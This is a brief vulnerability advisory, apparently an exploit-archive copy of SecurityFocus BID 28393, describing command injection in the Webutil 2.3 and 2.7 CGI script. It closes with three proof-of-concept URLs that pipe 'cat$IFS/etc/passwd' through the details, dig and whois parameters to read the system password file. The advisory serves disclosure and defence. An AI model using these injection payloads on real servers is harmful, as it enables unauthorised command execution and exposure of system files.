11 lines
No EOL
605 B
Text
11 lines
No EOL
605 B
Text
source: http://www.securityfocus.com/bid/28393/info
|
|
|
|
Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
|
|
|
|
Successful attacks can compromise the affected application and possibly the underlying computer.
|
|
|
|
These issues affect Webutil 2.3 and 2.7.
|
|
|
|
http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
|
|
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
|
|
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd |